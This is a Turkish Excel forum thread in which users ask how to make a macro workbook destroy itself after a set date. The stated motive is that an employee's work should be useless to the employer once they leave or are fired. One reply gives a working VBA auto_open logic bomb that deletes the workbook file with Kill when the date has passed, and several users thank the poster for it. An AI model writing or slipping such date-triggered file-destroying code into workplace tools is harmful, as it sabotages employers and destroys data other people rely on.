• DİKKAT

DOSYA İndirmek/Yüklemek için ÜCRETLİ ALTIN ÜYELİK Gereklidir!
    Altın Üyelik Hakkında Bilgi

belirtilen tarih geldiğinde excelde yapılan program kendini imha etsin

Excel Vers. ve Dili
office 2003 tr
excelde makrolarla yapılan bir program belirttiğimiz bir tarihte tümüyle kendini imha edermi yani çalışmaz duruma gelebilirmi

Bu konuda ustalar ne der bilmiyorum ama bence Excel kendini imha imkansız. Dosya açık iken hiç bir şey yaptırmaz. Ancak farklı kaydet veya içindeki işlevlerin çalışmaz hale gelmesi sağlanabilir.

evet aynen dediğiniz gibi olacak yani sadece o yapılan program çalışmaz hale gelecek

aslında mesele, eğer işten ayrılırsam yaptıklarım kimseye yâr olmasın meselesi.
bence belirli tarihten sonra dosya kendini imha etmesin, sayfa içindeki veriler ve sonuçlar korunsun ama formül,nesne,makro vs gibi şeyler silinsin diye sorsanız daha iyi olurdu.

excelde makrolarla yapılan bir program belirttiğimiz bir tarihte tümüyle kendini imha edermi yani çalışmaz duruma gelebilirmi

Bir deneme dosyası oluşturup modül içine aşağıdaki kodları yazınız.

Kod:
Sub auto_open() 
If Date >= CDate("07.11.2007") Then 
With ThisWorkbook 
        .Save 
        .ChangeFileAccess Mode:=xlReadOnly 
        Kill .FullName 
        .Close SaveChanges:=False 
    End With 
End If 
End Sub

aslında mesele, eğer işten ayrılırsam yaptıklarım kimseye yâr olmasın meselesi.
bence belirli tarihten sonra dosya kendini imha etmesin, sayfa içindeki veriler ve sonuçlar korunsun ama formül,nesne,makro vs gibi şeyler silinsin diye sorsanız daha iyi olurdu.

evet siz hatamı düzelttiniz dediğiniz gibi birşey olacak

bence belirli tarihten sonra dosya kendini imha etmesin, sayfa içindeki veriler ve sonuçlar korunsun ama formül,nesne,makro vs gibi şeyler silinsin.
bunun kodunu verir misiniz?

sn Ali link için teşekkürler.
ecnebice olduğu için incelemek zaman alacak. sanırım aradığım şeyi burada bulabilirim.

sanırım bu sitedeki kaynak daha çok işime yarayacak, akşam bu konu üzerinde çalışırım. ilginize teşekkürler

Paylaşım İçin Teşekkürler

Sayın ALi valla gerçekten büyüksünüz. Böyle bir işlem yapılabileceği hiç aklıma bile gelmezdi. Sayenizde 1 yaş daha yaşlandık. Sağlıcakla kalın.

Ben de bunu arıyordum. Google dan arama yapınca karşıma excel.web.tr sonucu çıktı. Burnumuzun dibindeki şeyi uzaklarda arıyormuşum :)

Teşekkürler

böyle bir macro varmıdır arkadaşlar belirli tarihten sonra (beni işten çıkardıklarını var sayarsak ) : ) o zaman bu macrolar devre dışı kalıcak.

Arkadaşlar merhaba..
Dosyayı inceledim ve denedim..Güzel iş görüyor..Fakat aklıma şöyle bir soru geldi.. Diyelim ki işten çıkarılacağınız tarihte çıkarılmadınız ve sizin dosyaya verdiğiniz tarih geçti.. Dosyayı açarsanız silinecek.. Bunu nasıl ortadan kaldırabiliriz?

Arkadaşlar merhaba..
Dosyayı inceledim ve denedim..Güzel iş görüyor..Fakat aklıma şöyle bir soru geldi.. Diyelim ki işten çıkarılacağınız tarihte çıkarılmadınız ve sizin dosyaya verdiğiniz tarih geçti.. Dosyayı açarsanız silinecek.. Bunu nasıl ortadan kaldırabiliriz? Yani,dosyayı açmadan VBA sayfasını açabilir miyiz?

Son düzenleme:
Makroları etkinleştirmeden girerek kodlaro deaktif edebilirsiniz.

Geri